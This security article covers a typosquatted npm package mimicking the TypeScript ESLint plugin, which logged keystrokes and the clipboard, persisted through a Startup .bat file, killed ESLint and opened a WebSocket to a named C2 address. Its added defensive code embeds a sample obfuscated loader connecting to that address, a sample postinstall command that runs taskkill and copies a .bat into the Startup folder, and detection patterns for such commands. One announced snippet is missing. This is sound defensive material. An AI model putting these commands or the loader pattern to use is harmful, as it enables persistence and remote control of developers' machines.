Malicious npm Package Targets Popular TypeScript ESLint Plugin to Steal Data and Enable Remote Attacks
Attackers used typosquatting to publish a malicious npm package that mimics a popular TypeScript ESLint plugin. Once installed, it compromises the developer's machine: it exfiltrates sensitive data, logs keystrokes, monitors the clipboard and accepts commands from a remote server. A companion package was still live on npm at the time of the report, so the threat persists and underscores the need for stronger package vetting in the open-source ecosystem.
Malicious Typosquatting npm Package Exploits Popular TypeScript ESLint Plugin to Exfiltrate Data and Enable Remote Exploitation
An attack on the open-source ecosystem has surfaced that trades on the trust developers place in popular npm packages. Using typosquatting, the attackers published a malicious npm package that mimics the widely used TypeScript ESLint plugin, @typescript-eslint/eslint-plugin. The impostor, @typescript_eslinter/eslint, swaps the hyphen in the scope for an underscore, appends "er" to "eslint" and drops "-plugin" from the package name, so a developer who mistypes the scope or skims a search result can install it without noticing. Once installed, the package carried out a range of hostile actions, from data exfiltration to remote command execution.
The attack chain began with the typosquatting package, published on npm on November 17th. Within two weeks, 43 versions were released, a tactic aimed at evading automated detection systems. The primary package was removed on December 1st, but any developer who installed one of those versions during that window was exposed.
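One way to catch a lookalike such as @typescript_eslinter/eslint before it is installed is to compare every dependency name against the packages and scopes a team actually uses, after folding the separators attackers like to swap. The following is an added example written for this article, not code from Socket or from any of the packages discussed; the KNOWN_PACKAGES allowlist and the sample dependency list are constructed, and the edit-distance threshold of 2 is a chosen heuristic:

```javascript
// Added example (not code from Socket's write-up or the packages discussed):
// flag dependency names that resemble well-known packages or scopes.
// KNOWN_PACKAGES is a constructed stand-in for an organisation's allowlist.
const KNOWN_PACKAGES = [
  '@typescript-eslint/eslint-plugin',
  '@typescript-eslint/parser',
  'eslint',
  'prettier',
  'lodash',
];

// Fold the separators attackers swap (hyphen, underscore, dot) and case,
// so "@typescript_eslint" and "@typescript-eslint" compare as equal.
function normalize(name) {
  return name.toLowerCase().replace(/[-_.]/g, '');
}

// Split "@scope/base" into its parts; unscoped names get scope null.
function splitName(name) {
  const m = /^(@[^/]+)\/(.+)$/.exec(name);
  return m ? { scope: m[1], base: m[2] } : { scope: null, base: name };
}

// Standard Levenshtein edit distance, single-row implementation.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Heuristic threshold (assumption): two edits catches separator swaps,
// transposed letters and short suffixes without flagging unrelated names.
const MAX_DISTANCE = 2;

// Report each dependency that is not an exact known name but sits within
// MAX_DISTANCE edits of a known scope (for scoped names) or a known package.
function findLookalikes(depNames, known = KNOWN_PACKAGES) {
  const knownSet = new Set(known);
  const knownScopes = new Set(known.map((k) => splitName(k).scope).filter(Boolean));
  const findings = [];
  for (const dep of depNames) {
    if (knownSet.has(dep)) continue;
    const { scope } = splitName(dep);
    if (scope) {
      for (const ks of knownScopes) {
        const d = levenshtein(normalize(scope), normalize(ks));
        if (scope !== ks && d <= MAX_DISTANCE) {
          findings.push({ name: dep, resembles: ks, reason: `scope within ${d} edit(s) of known scope` });
        }
      }
    }
    for (const k of known) {
      const d = levenshtein(normalize(dep), normalize(k));
      if (d <= MAX_DISTANCE) {
        findings.push({ name: dep, resembles: k, reason: `name within ${d} edit(s) of known package` });
      }
    }
  }
  return findings;
}

// Constructed sample dependency list, not taken from any real project.
const SAMPLE_DEPS = [
  '@typescript_eslinter/eslint',
  '@typescript-eslint/eslint-plugin',
  'lodahs',
  'express',
];

console.log(findLookalikes(SAMPLE_DEPS));
```

Scopes are checked separately from whole names because the scope is where this attack's deviation lives: a full-name comparison alone would miss @typescript_eslinter/eslint, which is more than two edits from @typescript-eslint/eslint-plugin. Run it over the dependency keys of package.json or the lockfile before install.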
Clipboard and Keyboard Logging: A Stealthy Data Theft
Upon installation, the malicious package monitors and captures sensitive data using two off-the-shelf libraries rather than custom code. Through the clipboard-event package it subscribes to clipboard changes and logs copied content, which on a developer workstation routinely includes passwords, API keys and tokens (Socket Research Team, 2024). Through the node-global-key-listener library it registers a global keyboard listener and records keystrokes as the developer types, so credentials and other confidential input are captured without the user's knowledge.
Persistence Mechanism: Ensuring Long-Term Access
To survive reboots, the malicious package drops a .bat file into the Windows Startup folder. Anything in that folder runs each time the user logs on, so the script is relaunched after every restart without elevated privileges or a registry change. This gave the attackers a foothold that outlasted the initial install.
Real-Time Remote Control via WebSocket
One of the most alarming aspects of the attack was the WebSocket channel. The package connected to a remote server at ws://135.181.226.254:5051, hosted in Finland (Socket, 2024). A persistent, bidirectional WebSocket lets the operator push commands and pull data in real time, giving continuous access to the compromised machine. The server address was not stored in clear text: it was hidden with Base64 encoding and string reversal, which defeats naive string matching over the package contents. The obfuscation only hides the indicator at rest; once the code runs, the connection still goes to that IP and port, so egress monitoring and network indicators remain effective.
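Since the C2 address was hidden with Base64 encoding and string reversal, a reviewer can recover such indicators statically by decoding every Base64-looking string literal in the package under each plausible ordering of the two transforms. The block below is an added example, not code from Socket's report or from the malicious package; the order in which the package applied the transforms is not given in the write-up, so all three orderings are attempted, and the sample source is constructed by encoding the address quoted above:

```javascript
// Added example (not code from Socket's report or the malicious package):
// recover network indicators hidden behind Base64 and string reversal.
// Matches ws/wss/http/https/ftp URLs and bare IPv4 addresses with optional port.
const INDICATOR_RE = /\b(?:wss?|https?|ftp):\/\/[^\s"'`]+|\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b/;

function reverse(s) {
  return s.split('').reverse().join('');
}

// Base64-decode defensively: Buffer.from never throws on bad input, but junk
// decodes to non-printable bytes, which are discarded here.
function b64(s) {
  const out = Buffer.from(s, 'base64').toString('utf8');
  return /^[\x20-\x7e]+$/.test(out) ? out : null;
}

// The write-up does not say which transform was applied first, so every
// plausible ordering is tried (assumption): decode, reverse-then-decode,
// decode-then-reverse.
function decodeVariants(literal) {
  const variants = [{ via: 'plain', value: literal }];
  if (literal.length >= 8 && /^[A-Za-z0-9+/=]+$/.test(literal)) {
    const direct = b64(literal);
    variants.push({ via: 'base64', value: direct });
    variants.push({ via: 'reverse+base64', value: b64(reverse(literal)) });
    variants.push({ via: 'base64+reverse', value: direct === null ? null : reverse(direct) });
  }
  return variants.filter((v) => v.value !== null);
}

// Walk every simple string literal in the source (literals containing escape
// sequences are skipped by this regex) and report decoded indicators.
function findNetworkIndicators(src) {
  const results = [];
  const literalRe = /'([^'\\]*)'|"([^"\\]*)"|`([^`\\]*)`/g;
  let m;
  while ((m = literalRe.exec(src)) !== null) {
    const literal = m[1] ?? m[2] ?? m[3];
    for (const v of decodeVariants(literal)) {
      const hit = INDICATOR_RE.exec(v.value);
      if (hit) results.push({ literal, via: v.via, indicator: hit[0] });
    }
  }
  return results;
}

// Constructed sample: the C2 address named in the write-up, Base64-encoded and
// then reversed, embedded in a snippet shaped like an obfuscated loader.
const HIDDEN = reverse(Buffer.from('ws://135.181.226.254:5051').toString('base64'));
const SAMPLE_SRC = `
const k = "${HIDDEN}";
const target = Buffer.from(k.split('').reverse().join(''), 'base64').toString();
const sock = new WebSocket(target);
fetch('https://registry.npmjs.org/-/ping');
`;

console.log(findNetworkIndicators(SAMPLE_SRC));
```

A production scanner would walk the AST with a JavaScript parser such as acorn instead of a literal regex, and would also try nested combinations (hex, URL-encoding, character-code arrays), but the decoding logic is the same.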
The Secondary Payload: Continued Threats
Alongside the primary package, the attackers published a secondary payload, @typescript_eslinter/prettier, which extends and spreads the malicious functionality of the first. While the main typosquatted package has been removed, this companion package was still live on npm at the time of Socket's report, so the campaign continues to pose a risk to developers (Socket Research Team, 2024).
Disabling Trusted Tools and Exploiting Developer Workflows
A particularly insidious part of the attack is that the package disables trusted development tooling: it runs a command that kills the legitimate eslint process. With the real linter out of the way, the attackers could substitute their own code for it, further compromising the development workflow.
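The behaviours described above (clipboard and keystroke capture through clipboard-event and node-global-key-listener, a .bat file dropped into the Startup folder, and a command that kills the eslint process) leave traces in a package's manifest and install scripts that a pre-install review can look for. The following added example is not code from Socket or from the packages discussed; it assumes the malicious actions are launched from an install-time lifecycle script, which the write-up does not state explicitly, and the sample manifest is constructed:

```javascript
// Added example (not from Socket's report or the packages discussed):
// heuristic review of a package manifest for the behaviours this article describes.
// Assumption: the payload is launched from an npm lifecycle script.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Libraries named in the report; a linter plugin has no reason to depend on them.
const SPYWARE_DEPS = ['clipboard-event', 'node-global-key-listener'];

// Command fragments that point at persistence, tool tampering or a raw C2 channel.
// The Startup path is the real per-user Windows location; the rest are heuristics.
const SUSPICIOUS_COMMAND_PATTERNS = [
  /\.bat\b/i,
  /\\Start Menu\\Programs\\Startup/i,
  /\btaskkill\b/i,
  /\b(?:pkill|killall)\b/i,
  /\bws:\/\//i,
];

// Returns a list of { kind, detail } findings; an empty list means nothing matched.
function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push({ kind: 'install-hook', detail: `${hook}: ${cmd}` });
    for (const re of SUSPICIOUS_COMMAND_PATTERNS) {
      if (re.test(cmd)) findings.push({ kind: 'suspicious-command', detail: `${hook} matches ${re}` });
    }
  }
  const deps = { ...(pkg.dependencies || {}), ...(pkg.optionalDependencies || {}) };
  for (const d of SPYWARE_DEPS) {
    if (d in deps) findings.push({ kind: 'spyware-dependency', detail: d });
  }
  // Shipped Windows/shell script files are worth a look in a pure-JS package.
  for (const f of pkg.files || []) {
    if (/\.(?:bat|cmd|vbs|ps1)$/i.test(f)) findings.push({ kind: 'script-artifact', detail: f });
  }
  return findings;
}

// Constructed sample manifest modelled on the behaviours in the article; the
// package name, script text and file names are invented, not the real package's.
const SAMPLE_MANIFEST = {
  name: '@example/not-a-real-linter',
  version: '1.0.0',
  scripts: {
    postinstall:
      'taskkill /f /im eslint.exe & copy run.bat "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"',
  },
  dependencies: { 'clipboard-event': '*', 'node-global-key-listener': '*', ws: '*' },
  files: ['index.js', 'run.bat'],
};

console.log(auditManifest(SAMPLE_MANIFEST));
```

Lifecycle scripts are the usual launch point for this class of package, which is why running `npm install --ignore-scripts` in CI and reviewing any package that needs an install hook is a worthwhile default.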
Additional Code Analysis: How the Malicious Package Operates
The @typescript_eslinter/eslint package runs a variety of commands on compromised systems, including killing legitimate linting processes such as ESLint. For example, the following code snippet is used to terminate the ESLint process:
The Wider Implications: A Call for Vigilance
This attack illustrates the growing sophistication of supply chain attacks on open-source tooling and how heavily developers rely on trusted package names. The wide adoption of @typescript-eslint/eslint-plugin made it an attractive target for typosquatting. According to Socket (2024), the attack affected a large number of systems and compromised sensitive project data, with potential follow-on consequences including credential theft, unauthorized access to private repositories and further exploitation of the affected machines.
The ongoing threat posed by the secondary payload, @typescript_eslinter/prettier, is a stark reminder of the persistent risks in the open-source ecosystem. Developers must adopt strict security practices: check package names, and especially scopes, before installing; pin dependencies with a lockfile; review install-time lifecycle scripts; and consider installing with --ignore-scripts where the workflow allows it. Tools like Socket for GitHub and the safe npm CLI help by flagging suspicious packages and blocking known supply chain attacks.
Conclusion
The typosquatting attack leveraging the @typescript_eslinter/eslint package is a potent example of how attackers exploit the trust inherent in the open-source ecosystem. While the initial package has been removed, the persistence of the secondary payload, together with the techniques used in the attack, highlights the evolving nature of supply chain threats. Developers must remain proactive in safeguarding their environments, using specialized tools to detect malicious packages before they can do harm (Socket Research Team, 2024).